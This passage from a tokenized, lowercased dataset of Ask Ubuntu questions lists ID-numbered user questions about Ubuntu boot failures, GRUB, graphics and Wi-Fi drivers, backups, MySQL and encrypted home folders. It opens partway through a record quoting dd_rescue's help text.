ubuntu @ ubuntu : ~ $ sudo dd_rescue /dev/sdc /media/seagate expansion drive/image.dd dd_rescue : ( fatal ) : spurious options : expansion ... dd_rescue version 1.14 , garloff @ suse.de , gnu gpl ( $ id : dd_rescue.c , v 1.59 2007/08/26 13:42:44 garloff exp $ ) dd_rescue copies data from one file ( or block device ) to another . usage : dd_rescue [ options ] infile outfile options : -s ipos start position in input file ( default=0 ) , -s opos start position in output file ( def=ipos ) , -b softbs block size for copy operation ( def=65536 ) , -b hardbs fallback block size in case of errs ( def=512 ) , -e maxerr exit after maxerr errors ( def=0=infinite ) , -m maxxfer maximum amount of data to be transfered ( def=0=inf ) , -y syncfrq frequency of fsync calls on outfile ( def=512*softbs ) , -l logfile name of a file to log errors and summary to ( def= '' '' ) , -o bbfile name of a file to log bad blocks numbers ( def= '' '' ) , -r reverse direction copy ( def=forward ) , -t truncate output file ( def=no ) , -d/d use o_direct for input/output ( def=no ) , -w abort on write errors ( def=no ) , -a sparse file writing ( def=no ) , -a always write blocks , zeroed if err ( def=no ) , -i interactive : ask before overwriting data ( def=no ) , -f force : skip some sanity checks ( def=no ) , -p preserve : preserve ownership / perms ( def=no ) , -q quiet operation , -v verbose operation , -v display version and exit , -h display this help and exit . note : sizes may be given in units b ( =512 ) , k ( =1024 ) , m ( =1024^2 ) or g ( 1024^3 ) bytes this program is useful to rescue data in case of i/o errors , because it does not necessarily abort or truncate the output .
503658	not able to see some folders in a drive	i 'm using ubuntu 14.04 . some folders are missing in my hard disk drive but after checking the disk memory it shows disk used space as 12.5 gb and after selecting all files using ctrl+a and checking its properties it shows total 4.5 gb i have also selected 'show hidden files ' option from view menu but then also it shows same number of folders
503660	how can i reinstall my 14.04 ubuntu from windows 7	i updated my ubuntu from 13.10 to 14.04 but now it just gives me errors when i try to boot it saying it ca n't find the / . directory and it ca n't mount /tmp or some % $ # @ . so i would really like to just uninstall it and install 14.04 again from scratch so i do n't get random errors . what is the best way to do this ?
503662	14.04 - keyboard does not work in login screen after sleep	i have an issue i 'm not sure how to work out . on ubuntu 14.04 , after sleeping the keyboard will be non-responsive most of the time on the lightdm login screen . it 's not completely non-responsive : i can still ctrl+alt+f1 into a virtual terminal to restart the lightdm service and everything is alright . however , obviously anything i left behind when i originally put the laptop to sleep has now been washed away , somewhat defeating the purpose . where do i look to figure out what the problem might be ? edit : as it turns out , the original solution i found does not solve the problem . it still recurs fairly frequently ( without reinstalling the input package over and over again ) . in this case the mouse and keyboard work fine , except for typing a password into the box . this can be solved simply by highlighting some other gui element , for example i click the power button in the top right . after that the text input works fine again . it 's a bit bizarre ...
503669	how do i stop ubuntu updates from taking over the mbr ?	i have a perfectly wonderful multi-boot setup with a stand alone grub2 partition booting from the mbr and from that grub2 menu i can boot other operating systems on other partitions ( using , for example , the configfile command ) . this has been working perfectly till an ubuntu update came along today and overwrote the mbr , thus disabling my wonderful stand alone grub . i got it back , but what i want is to never have ubuntu do that again . how do i make sure ubuntu keeps its grubby fingers off my mbr ?
503671	how to increase screen colour saturation ?	i am trying to find a way to increase the colour saturation in lubuntu 14.04 on my notebook . my machine is a dual boot setup with both lubuntu and windows 7 ultimate . in windows 7 the colours used to be very washed out , but i increased the screen saturation significantly using the intel graphics hd control panel . now it looks really nice and the colours are much better . however , when i boot into lubuntu i have the same problem , the colours look very washed out and incorrect . i would like to boost the saturation but i am not sure how to . people on here and other forums have mentioned a program called gnome colour manager , but this does not allow the modification of saturation levels . are there any other methods/programs i can try which would let me do this ? i have spent hours looking for a solution on the internet but i am not having any luck .
503672	term enviroment variable not set	this is the code that i want to execute through motd : # ! /bin/bash ip=`ifconfig | grep 'inet addr : '| grep -v '127.0.0.1 ' | cut -d : -f2 | awk ' { print $ 1 } '` # clear echo -e `` welcome to \e [ 0 ; 32mdms 4\e [ 0m '' echo echo -e `` connect with your browser to following ip-address : \e [ 0 ; 32mhttp : // $ ip\e [ 0m '' echo echo `` if no ip-address is shown above then '' echo `` maybe there is no dhcp-server available in your network . '' echo `` if so you have to change the ip to a static address . '' echo -e `` just type \e [ 0 ; 32mnetconf\e [ 0m and press enter '' i placed /usr/sbin/autologin-screen ( location of the script ) in my 00-header file under the /etc/update-motd.d folder . does anyone have an idea why i am getting this error : term environment variable not set note* removing clear removed 1 error . i still have another term environment variable not set
503674	ubuntu 12.04 - installing nvidia-current driver fails	edit after trying a lot of things i gave up and i installed ubuntu 14.04 . now i can simply install the proprietary drivers selecting them in the additional drivers settings . i 'm trying to install the nvidia drivers for my notebook but i 'm having a lot of troubles ... first some info on my system . i have ubuntu 12.04 64 bit , lspci gives : 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 3d controller : nvidia corporation gf117m [ geforce 610m/710m / gt 620m/625m/630m/720m ] ( rev a1 ) the kernel is 3.5.0-54-generic . i have installed the nvidia-current package but then i ended with a screen resolution of 640x480 . so i purged nvidia stuff , i removed the /etc/x11/xorg.conf file and i got back my system using the nouveau driver . how can i install the nvidia drivers ? in my repos there are other packages $ sudo apt-get install nvidia- nvidia-173 nvidia-331-updates-uvm nvidia-current-updates-dev nvidia-173-dev nvidia-331-uvm nvidia-experimental-304 nvidia-173-updates nvidia-96 nvidia-experimental-304-dev nvidia-173-updates-dev nvidia-96-dev nvidia-experimental-310 nvidia-304 nvidia-96-updates nvidia-experimental-310-dev nvidia-304-dev nvidia-96-updates-dev nvidia-opencl-dev nvidia-304-updates nvidia-cg-toolkit nvidia-prime nvidia-304-updates-dev nvidia-common nvidia-screenlet nvidia-319 nvidia-compute-profiler nvidia-settings nvidia-319-dev nvidia-cuda-dev nvidia-settings-304 nvidia-319-updates nvidia-cuda-doc nvidia-settings-304-updates nvidia-319-updates-dev nvidia-cuda-gdb nvidia-settings-319 nvidia-331 nvidia-cuda-toolkit nvidia-settings-319-updates nvidia-331-dev nvidia-current nvidia-settings-experimental-304 nvidia-331-updates nvidia-current-dev nvidia-settings-experimental-310 nvidia-331-updates-dev nvidia-current-updates nvidia-settings-updates but i do n't know which else i can try ... if i understood correctly my pc has the optimus technology that is it has two graphics cards , one intel and the other is the nvidia one . some comments on forums seem to suggest that this technology is supported in ubuntu less than 13 only installing bumblebee , is that correct ? if i upgrade my system to ubuntu 14.04 the problem remains the same ?
503677	automatic backup of folder	i have one particular folder on my linux box that i would like to have fully backed up and be able to `` go back in time '' on a file and see all previous revisions . to add complications , this folder is shared ( with the inbuilt sharing tools ) and is accessed and written to by a windows machine . for this reason , i 'd like the backup to be written to a place where the windows machine does not have access . how can i set this up ?
503680	brightness does n't decrease in ubuntu 14.04	i 've recently installed ubuntu 14.04 in my dell inspiron 5521 . i find that brightness is set to a maximum level and brightness keys does n't work though they show as if it gets decreased . i searched online and found a solution . but after following the steps , on rebooting , i got just a black screen . tried brightness keys , yet black screen remains . to revert the changes , i live booted via a usb drive and solved . now , ubuntu boots , but still brightness remains maximum . hope i 'll get to solve this .
503685	is permission required for creating a derivative ?	i wanted to create an ubuntu derivative and distribute it . i have read this post . it says no permission is required for creating a derivative and using it . but if it is given to organizations under a separate name ( saying it is a derivative of ubuntu ) , does this not require permission from ubuntu or canonical ? if not , when is permission required for creating and distributing a derivative ? will availing permission mean that it is a recognized derivative ?
503686	grub does n't boot after kernel upgrade	i upgraded my ubuntu 12.04 lts via terminal and now grub does n't find any kernel . i tried to look inside the /boot folder via grub terminal , but on my primary hard disk the folder seems to be empty . did ubutnu delete all kernels ? how do i rescue my original configuration ?
503690	bash script to back up file	i have a few files to be backed up . i need a script to check line number of a file and if it exceeds , say 8000 lines , it will simply zip it and name it with date prefix format . i need your help .
503693	ubuntu wont boot wont mount	i am new to linux , my computer says : an error occurred while mounting /boot/efi press s to skip mounting or m for manual recovery i search how to fix this everything i found had to do with dual booting windows , but my computer has only ubuntu .
503694	check vga device is active or not using video4linux	currently i am using vga2usb device for interacting with vga device . vga2usb device is actually vga frame grabber capable of capturing output from virtually any vga source—such as a windows pc , a mac osx , a unix machine , an em­bed­ded system , a medical device . to use this device we have to require relative drivers installed . these drivers are interacting with video4linux ( v4l ) . now i have to detect that connected vga device is active or not . ( i.e device is in sleep mode or not ) . so i have a question how can i find that vga device is active and sending the vga signals . i am using ubuntu 12.10 for this .
503695	ubuntu 14.04 problem with windows 7 boot menu	i have asked a question previously here , regarding installing ubuntu inside windows 7 . but the answer was ubuntu install inside option is having various errors . so i decided to install ubuntu along with windows 7 as everybody does . after that ubuntu works perfectly and windows 7 is not booting . so i searched in this forum and found a solution here . now windows 7 is working perfectly and ubuntu is unable to boot . the same error message again appeared . the disk management snapshot : http : //paste.ubuntu.com/7885380/
503698	fn-key binding ; what needs to be known ?	i 've beeen trying to read some about how to bind the fn + key combos to do certain common actions ( toggle wifi , toggle bluetooth , brightness up/down , toggle touchpad , mute/unmute , volume up/down , etc etc ) , but i ca n't grasp the basics ; i 'm really really new to linux overall , so any specifics are off my understanding without previous explanation . if i 'm correct , i need to set the sequence scancode - > keycode - > keysymbol correctly for binding a key . how are these done ? are any of these system-specific or hardware-specific details ? i have what seems a really standard keyboard ( latam keyboard , with 単 ) thanks in advance for any help provided .
503699	how to install nancyfx ?	i need to install nancyfx for succesfully building omnisharp server . how can i do that in ubuntu 12.04 ?
503700	not formatting a partition while installing ubuntu but still data getting lost from that partition !	i 'd ubuntu 13.10 on my system with separate /home partition for my data . now i reinstalled the same o.s . in the option while installing , i selected something else & there specified to format all partitions ( / , /var , /tmp , /boot ) except /home . now when my system was installed , i found the data was lost on the home partition . i wondered as i had unchecked for formatting that partition while installation . to test it again , i created a file in /home . then using my bootable usb flash drive , i reinstalled the o.s . this time also i unchecked /home for formatting . but still afterwards i found the file i created on the home partition was lost . where am i thinking wrong ? i thought it was a good method of installation to preserve home data but it 's not working ! ! edit # 1 yes i got clue from a comment . the problem is something else . yes it 's mounting on /home , that 's no problem . see what has happened ! in the 1st system ( ubuntu 13.10 ) i 'd logged in with the name of `` ravi '' . i 'd much data in the subdirectories of /home/ravi . then i upgraded the system to 14.04 which did n't work , so i installed back the earlier o.s . ( i.e . 13.10 . ) by keeping the same /home partition . this time while installing i changed the login name as `` bholu '' . now after getting installed & logging in as `` bholu '' , i checked my home directory & subdirectories but did n't find any data . then to further test , i created a file in home directory & reinstalled the o.s . with the same /home . now this time i changed the login name to `` bholua '' . again now i did n't find the file i created earlier . so , i 'd that doubt that the data are getting lost . now after reading a comment , it striked my mind & i checked my /home folder . there all the 3 names were present . bholua @ bholua-aspire-5315 : /home $ ls bholu bholua lost+found ravi bholua @ bholua-aspire-5315 : /home $ now when i move to one username `` ravi '' , i see the below contents there . bholua @ bholua-aspire-5315 : /home/ravi $ ll total 12 dr-x -- -- -- 3 bholua bholua 4096 jun 25 02:25 ./ drwxr-xr-x 7 root root 4096 jul 27 23:39 ../ lrwxrwxrwx 1 bholua bholua 56 jun 25 02:04 access-your-private-data.desktop - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.desktop* drwx -- -- -- 3 bholua bholua 4096 jun 25 02:25 .cache/ lrwxrwxrwx 1 bholua bholua 30 jun 25 02:04 .ecryptfs - > /home/.ecryptfs/ravi/.ecryptfs/ lrwxrwxrwx 1 bholua bholua 29 jun 25 02:04 .private - > /home/.ecryptfs/ravi/.private/ lrwxrwxrwx 1 bholua bholua 52 jun 25 02:04 readme.txt - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.txt now see the content of the other username `` bholu '' . it 's the same here . bholua @ bholua-aspire-5315 : /home/ravi $ ll /home/bholu total 12 dr-x -- -- -- 3 bholua bholua 4096 jul 28 03:16 ./ drwxr-xr-x 7 root root 4096 jul 27 23:39 ../ lrwxrwxrwx 1 bholua bholua 56 jul 28 03:13 access-your-private-data.desktop - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.desktop* drwx -- -- -- 3 bholua bholua 4096 jul 28 03:16 .cache/ lrwxrwxrwx 1 bholua bholua 31 jul 28 03:13 .ecryptfs - > /home/.ecryptfs/bholu/.ecryptfs/ lrwxrwxrwx 1 bholua bholua 30 jul 28 03:13 .private - > /home/.ecryptfs/bholu/.private/ lrwxrwxrwx 1 bholua bholua 52 jul 28 03:13 readme.txt - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.txt now the point is how to access those data created under username of `` ravi '' & `` bholu '' ! it seems i 'd earlier enabled encryption of my home directory . linuxubuntu ravisingh1 is online now report this post
503704	ubuntu 14.04 can not start after upgrade	i have just upgraded from ubuntu 12.04 to ubuntu 14.04 , but now i can not start up the system . i have tried to go to advanced options and newest recovery mode - root - and command fsck -a - as recommended - then fix network - and dpkg options . after this i ended up in the console where ubuntu ask me to logg in . i press my name ( kenneth ) and then password . after this it says : welcome to ubuntu 14.04.1lts *documentation : https : //help.ubuntu.com/ kenneth @ ubuntu : $ : what command must i give to start up from there ?
503707	how to choose default output port ( boot screen ) in a nvidia card ?	i have a nvida card and binary drivers . i have my monitor connected at the vga port and the tv at the hdmi port . when the computer boots , the grub menu and sometimes the login screen goes to the tv ( hdmi output ) . how do i select the default video output to be the vga port ? edit : the dell logo also goes to the hdmi port , also the grub menu and boot messages . just when the login screen appears , it uses my configured main display . i 've recently added the nvidia card . ubuntu was installed using an onboard intel chipset .
503709	grub error on boot	i 'm using windows 8.1 on my lenovo laptop and i installed ubuntu 14.04 as dual boot os . unfortunately i deleted the ubuntu partition in windows disk management . when i reboot it is showing this error : error - error : no such partition entering rescue modeâś grub rescue > no such partition entering into grub resque mode also im unable to enter into bios configuration . i read many reviews but not worked in my case .
503713	video editor with 120fps support	i have a clips captured with gopro3+ with the frame rate 120fps . i would like to perform some slow motion clips by stretching the video on a time-line and then in the output i want to get the file with 30fps but smoothly slowed down . all of the editors i tried are automatically converting the 120fps file into a 25-30fps when i import it to a program and all other frame just are lost . please suggest any video editing software under linux which is fully supports 60fps and 120fps video files .
503715	no graphical interface at startup	i just installed lubuntu 14.04 32 bit . the problem is that i ca n't seem to be able to use the lubuntu graphical interface , when i start up lubuntu all i get is a black screen with words asking for my user name and password .
503716	usb to ide/sata adapter : see partitions under winxp but not under ubuntu	i want to learn caine . so i took an old ide hdd , connected external power and a logitech usb to sata/pata adapter , and booted to ubuntu-based live-dvd caine . no usb storage was found . to test the hardware , i booted to winxp - and was able to see fat partitions of the drive . so , both drive and usb-ata adapter seem to work . where do i start looking for the reason why i see no /dev/sda1 ? there is a chance that logitech adapter is too old ( like in this therad ) , so i am ok investing $ 10 into new adapter before investigating logithech deeply . which adapters are known to work well with ubuntu ( germany ) ?
503717	how may i get rid off canonical addlens ?	i did disable commercial entries in my privacy-settings . however , i still receive entries in my dashboard .
503723	samsung ml2165w printer wo n't print wireless	how can i get the above mentioned printer to print wireless in ubuntu 14.04 ? it prints only when the usb cable is connected to the laptop . i would appreciate assistance .
503724	12.04.x hwe hardware enablement update broke nvidia proprietary drivers	i run ubuntu 12.04.4 lts 32 bit version and recently took the option to take the hwe upgrade from update manager . now either the computer freezes or i go into a low graphic mode similar to the terminal . i believe this is because i have an old nvidia fx5600 graphic card . if i run 3.13.0-32-generic in recovery mode i can use my computer . my question is can i reverse out the hwe upgrade or will i have to reinstall the os from scratch using the original cd ?
503731	unable to connect to wireless network on my sony f15218 laptop with ubuntu 12.04 lts 64 bit	i have been trying since yesterday to get wifi working on my laptop . it was working fine till yesterday but has stopped working now . actually the problem is it 's not able to find my home wifi . it does n't show my home wifi at all . i changed my modem yesterday and since then it has stopped working . i have done various things and it 's all messed up as of now . this is the configuration of my driver : network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) earlier i had installed the driver exactly as given over here : https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx # b43142 the internet worked fine but when i changed my modem yesterday my laptop was n't able to detect the new modem/wifi but the wifi works fine on my phone so the modem is configured fine . i followed quite a few things online but nothing seems to work . this http : //pastebin.ubuntu.com/7886319/ is the output of the script i ran according to this link my wireless/wifi connection does not work . what information is needed to diagnose the issue ? and the out put of the following code sudo dpkg -s bcmwl-kernel-source is on this link -- > > pastebin.ubuntu.com/7890911/ can someone please help .
503733	suspend issue on macbook pro 3.1 running ubuntu 12.04	i know there are a lot of question like this , but using the solution proposed i was not able to fix the problem . i tried : grub_cmdline_linux_default= '' nomodset acpi_sleep=nonvs '' and sudo update-grub sudo reboot but nothing happened ; i tried the script proposed by dragonninja9 in various version ( this ; this ) but the issue still remains . i run ubuntu 12.04 with the back-ported kernel 3.13.0-32-generic ( 64bit ) on a macbook pro 3.1 ; i use fbdev video drivers and i do n't want to install the nvidia drivers at all ! ! ! i enabled the hibernate and it works very well . does anyone has any idea on how to fix this issue ?
503734	how do i install ubunutu from my android ?	my pc with windows 7 got infected with a virus and i 'm sick of it ! i want to install ubunutu but do n't have a cd . i do however have an android . can i put ubunutu installation file on my phone then format my harddrive and boot from my phone via usb ?
503736	how to calculate grid_unit_px	i want calculate a grid_unit_px for the 1280*720 5 '' 295 ppi display . what the math formula do i use ?
503738	upgrading the core of a distro	if we have a distro ( a ) based on a distro ( b ) , and the distro ( b ) get un upgrade ( it becames b.01 ) can we have un upgrade to the ( a ) distro to make it based on ( b.01 )
503747	how can i reinstall ubuntu gnome 14.04	i want to reinstall ubuntu but when i insert a live cd into my pc there is no option for reinstalling . it shows options to either install ubuntu alongside ubuntu and remove the data from the pc and then install ubuntu . is this a bug ?
503751	configure xdebug ubuntu 14.04	i ca n't seem to get apache 2.4 to load my xdebug configuration . i 've added : zend_extension=xdebug.so remote_enable=on to /etc/php5/apache2/conf.d/20-xdebug.ini . according to phpinfo ( ) that file does get parsed , but remote_enable is still off . i do n't see any errors in the logs . what else might i be missing ?
503752	where is the icedtea control panel ?	i want to disable the sandbox banner on java webstart applications , and the official documentation hints at a control panel , but i am unable to find it .
503757	unable to boot from usb	i 'm trying to install lubuntu as a dual boot , but i ca n't boot from my usb . i went into bios and changed the order , but the order just resets when i restart my computer even if i save the changes in the bios . so i tried to install the wubi offers when i ca n't boot from cd , but i get an error saying an error occurred could not retrieve the required installation files . for more information , please see log file : contents of the log file . does anyone know how to solve this ? because this didnt work . i tried to remake the drive . and for some reason now the wubi gets installed instead of lubuntu itself . when i double click the usb from my computer . instead of prompting to rebootn it shows the wubi option screen where 30gb is the max ... i honestly have no idea what is going on..
503758	usb ports and sound are not working in ubuntu 10.04 lts	i bought satellite c50b p0010 recently . but the usb ports and sound are not working in ubuntu 10.04 lts . dmesg | tail [ 20.320149 ] usb 1-1 : new high speed usb device using ehci_hcd and address 3 [ 35.876130 ] usb 1-1 : device not accepting address 3 , error -110 [ 35.988136 ] usb 1-1 : new high speed usb device using ehci_hcd and address 4 [ 46.420156 ] usb 1-1 : device not accepting address 4 , error -110 [ 46.532155 ] usb 1-1 : new high speed usb device using ehci_hcd and address 5 [ 56.964161 ] usb 1-1 : device not accepting address 5 , error -110 [ 56.964180 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 90.564605 ] r8169 : eth0 : link up [ 90.565489 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 101.112160 ] eth0 : no ipv6 routers present
503759	having difficulties with `` sudo apt-get update '' after moving into another country	i have moved temporarily from turkey into germany for 1.5 months and the code sudo apt-get update does not work as intended producing lots of errors . in order to avoid it i tried deleting the following file from the directory /etc/apt/sources.list.d/ ; furthermore i commented out a few lines in the sources.list file up to no avail . everytime the culprit is something different . sudo rm ubuntu-x-swat-x-updates-precise.list sudo rm ubuntu-x-swat-x-updates-precise.list.save the output of the sudo apt-get update command can be found in the following link : http : //paste.ubuntu.com/7905503/ here is the output for apt-config dump : paste.ubuntu.com/7898595 the file containing `` acquire '' // automatically upgrade packages from these ( origin : archive ) pairs unattended-upgrade : :allowed-origins { `` $ { distro_id } : $ { distro_codename } -security '' ; // `` $ { distro_id } : $ { distro_codename } -updates '' ; // `` $ { distro_id } : $ { distro_codename } -proposed '' ; // `` $ { distro_id } : $ { distro_codename } -backports '' ; } ; // list of packages to not update unattended-upgrade : :package-blacklist { // `` vim '' ; // `` libc6 '' ; // `` libc6-dev '' ; // `` libc6-i686 '' ; } ; // this option allows you to control if on a unclean dpkg exit // unattended-upgrades will automatically run // dpkg -- force-confold -- configure -a // the default is true , to ensure updates keep getting installed //unattended-upgrade : :autofixinterrupteddpkg `` false '' ; // split the upgrade into the smallest possible chunks so that // they can be interrupted with sigusr1 . this makes the upgrade // a bit slower but it has the benefit that shutdown while a upgrade // is running is possible ( with a small delay ) //unattended-upgrade : :minimalsteps `` true '' ; // install all unattended-upgrades when the machine is shuting down // instead of doing it in the background while the machine is running // this will ( obviously ) make shutdown slower //unattended-upgrade : :installonshutdown `` true '' ; // send email to this address for problems or packages upgrades // if empty or unset then no email is sent , make sure that you // have a working mail setup on your system . a package that provides // 'mailx ' must be installed . //unattended-upgrade : :mail `` root @ localhost '' ; // set this value to `` true '' to get emails only on errors . default // is to always send a mail if unattended-upgrade : :mail is set //unattended-upgrade : :mailonlyonerror `` true '' ; // do automatic removal of new unused dependencies after the upgrade // ( equivalent to apt-get autoremove ) //unattended-upgrade : :remove-unused-dependencies `` false '' ; // automatically reboot *without confirmation* if a // the file /var/run/reboot-required is found after the upgrade //unattended-upgrade : :automatic-reboot `` false '' ; // use apt bandwidth limit feature , this example limits the download // speed to 70kb/sec //acquire : :http : :dl-limit `` 70 '' ;
503760	hybrid graphics and xorg.conf	is there any sane way to be able to configure x server and have working hybrid graphics at the same time ? whenever i add `` xorg.conf '' x server stops loading driver for second ( discrete ) gpu . example configuration : section `` device '' identifier `` card0 '' driver `` intel '' busid `` pci:0:2:0 '' option `` accelmethod '' `` sna '' option `` tearfree '' `` true '' option `` swapbufferswait '' `` false '' endsection section `` device '' identifier `` card1 '' driver `` radeon '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` screen1 '' device `` card0 '' endsection with this x server simply skips loading `` radeon '' driver , no gpu prime support then .
503763	connection dropouts with realtek rtl8188ce	i 'm an ubuntu rookie with an unresolved wireless internet connection issue . i 've spent a lot of time fiddling around in my never-ending quest to get my connection working properly , but my inexperience is beginning to show and i need a little extra help . the issue in brief : slow speed ( ookla clocks in at ~5-8mbps download speed - it should be ~20 ) and connection dropouts occur every ten minutes . os : ubuntu 14.04 kernel : 3.13.0-32-generic i 've done some homework and tried a lot of solutions from these forums . i think ultimately the problem is going to be with the driver rtl8192ce . i 've tried changing it to rtl8188ce using freedomben 's tutorial , but i ca n't fathom how to use script for the automatic installation ( i have problems with manual installation too , but i do n't want to ask two questions in one post , so i 'll save them for later ) . can anyone help me out ? i think i have the .zip downloaded if that 's important . i 've included outputs to various terminal commands below that may also prove helpful . lshw description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : bc : ee:7b : e4 : e8:22 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.13.0-32-generic firmware=n/a ip=192.168.0.41 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn lsmod | grep rtl rtl8192ce 52806 0 rtl_pci 26314 1 rtl8192ce rtlwifi 52835 2 rtl_pci , rtl8192ce rtl8192c_common 47340 1 rtl8192ce mac80211 546051 3 rtl_pci , rtlwifi , rtl8192ce cfg80211 409394 2 mac80211 , rtlwifi iwconfig wlan0 ieee 802.11bgn essid : '' virginmedia0147357 '' mode : managed frequency:2.462 ghz access point : a0:21 : b7 : d6:9b : e2 bit rate=72.2 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=46/70 signal level=-64 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:1 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . lspci 02:00.0 ethernet controller : qualcomm atheros qca8171 gigabit ethernet ( rev 10 ) 03:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) sorry if i 've missed something obvious , i 'm green as grass but , as you can see , willing to suffer a lot of hassle to avoid returning to windows .
503764	change position of user-triggered-indicators in unity top-bar	ubuntu 14.04 lts 64bit unity kernel v3.0.13.24-generic i have indicator-synapse installed and it starts automatically on startup . i also have shutter , cpu-freq , etc. , which are started up after i login , that their indicators take the left-most position after i login . i always want indicator-synapse to be the leftmost indicator in the top-bar . is there a way to do it ? if yes , how ? if not , is there a way to start indicator-synapse after cpu-freq and shutter , so that i can have it as the left-most indicator ? apologize if this question is a duplicate . i also do n't know the name of the process , i tried with name indicator-synapse , but id did n't help . further i checked the startup-applications and rc.local file for the indicator-synapse trigger command so as to add indicator-cpufreq before that , but i did n't find it too . help me .
503766	change plymouth screen resoltion ?	is it possible to change the screen resolution for plymouth ? i 'd like to change it to 1920x1080 , because it is a pretty small resolution by now ( about 360p ) and the plymouth-theme-solar does n't look very nice . after booting up , the resoltion is just fine ( 1080p ) .
503769	can i install ubuntu on my laptop ?	i have a hp pavilion g6 laptop , it runs windows 8.1 . i was planning to use a free os for a while . which is the recommended ubuntu version for me ? i am totally a newbie to such os . i have only used windows till date .
503772	how to get factor of integer number using command-line ?	i want to get prime factor of some integer numbers by using command-line . example : an integer number 786 has ( prime ) factors : 2 , 3 and 131 other example for 1234567890 is : 2 , 3 ( two times ) , 5 , 3607 and 3803 . how do i get such above result using simple command ?
503774	local folder for specific mysql databases with symlinks	moving specific mysql databases under home folder using symlink used to work in the past for me ( maybe before upgrading from 13.10 to 14.04 ) but now , following the same procedure , it just does not work . after stopping mysql service , i have moved files ( innodb , frm files ) from /var/lib/mysql/mydb to /home/me/dbs/mydb ; created symbolic links ; ensured files permissions and ownership ( mysql : mysql and 'me ' belongs to mysql group ) are correct ; and edited /etc/apparmor.d/usr.sbin.mysqld : /var/lib/mysql/ r , /var/lib/mysql/** rwk , /home/me/dbs/mydb/ r , /home/me/dbs/mydb/** rwk , and /etc/apparmor.d/tunables/alias : alias /var/lib/mysql/mydb/ - > /home/me/dbs/mydb/ , but database seems to be lost . actually , sql-workbench displays database schema , but no tables are found . error.log records persistently that tables have not been found : 140728 17:05:31 [ error ] /usr/sbin/mysqld : ca n't find file : './mydb/mytable1.frm ' ( errno : 13 ) 140728 17:05:31 [ error ] /usr/sbin/mysqld : ca n't find file : './mydb/mytable2.frm ' ( errno : 13 ) and so on , all tables , a few times each table . listing tables in /home/me/dbs/mydb : drwxrwx -- - 2 mysql mysql 4096 jul 28 12:58 . drwxr-xr-x 5 me me 4096 jul 28 16:38 .. -rw-rw -- -- 1 mysql mysql 61 jul 28 12:53 db.opt -rw-rw -- -- 1 mysql mysql 8688 jul 28 12:58 mytable1.frm -rw-rw -- -- 1 mysql mysql 9284 jul 28 12:58 mytable2.frm and , as said earlier , user 'me ' belongs to group mysql . link in /var/lib/mysql : lrwxrwxrwx 1 mysql mysql 47 jul 24 18:33 mydb - > /home/me/dbs/mydb/ as said before , this used to work in the past but now it does not . thanks .
503775	font colour problem in lxde	i was tweaking around in lxde . i was having the help of this guide but at some step i ended up with this problem . the font colour at some places is very close to the background . i want to fix the font colour . i ca n't find out how . i want to keep the theme but i can throw it away if there 's no other fix . p.s : i was at `` step 2 '' in that guide
503776	md5 hash for ubuntu-14.04.1-desktop-amd64.iso	i cant find the md5 hash for ubuntu-14.04.1-desktop-amd64.iso on this website . am i looking in the right place ? note : 14.04.1 i know that the 14.04 hashes are there . are they the same ?
503777	how do i get wine to open and app and load in a file ?	i have a .desktop launcher that is available from the open with options in nemo ( or nautilus ) . i 'm able to right click and `` open with '' and the app will launch , but the file does n't load in . i 've tried % u and % f to no avail . i 've had this working previously , so not sure what broke . [ desktop entry ] version=1.0 type=application terminal=false icon [ en_us ] =/home/me/pictures/ubuntu wallpaper and icons/icons/foxit.png name [ en_us ] =pdfedit exec=wine `` /home/me/.wine/drive_c/program files/foxit software/pdf editor/pdfedit.exe '' % u name=pdfedit icon=/home/kschiff/pictures/ubuntu wallpaper and icons/icons/foxit.png
503779	open startup applications preferences on lubuntu 14.04	i recently installed lubuntu 14.04 on a compaq nc6000 with 768mb of ram and 80gb hard drive . i want to tweak lubuntu for faster bootup ( because it is slow ) . i watched a video on youtube , where the author suggested tweaking it from startup applications preferences . i could n't locate it and i do n't know how to `` create it '' . i tried to follow the directions she suggested : inputting a command on the terminal : sudo sed -i `` s/nodisplay=true/nodisplay=false/g足 '' /etc/xdg/autostart/*.desktop then hit enter for changes to be applied . but i ca n't open the startup applications preferences window because i do n't know how to do it or create it on lubuntu 14.04 ! she also suggested installing preload from software center .
503781	lubuntu installation - - amd athlon -- boot bypassing grub screen	i recently installed lubuntu 14.04 for a friend , on an old xp machine , a packard-bell amd athlon 64 . the installation , apparently went smoothly , however when i rebooted , lubuntu booted straight to the lubuntu splash screen , that is , by passing the expected grub screen . just wondering has anyone seen this type of behaviour before ? i am unsure if it is a bad install or just an artifact of the older hardware ?
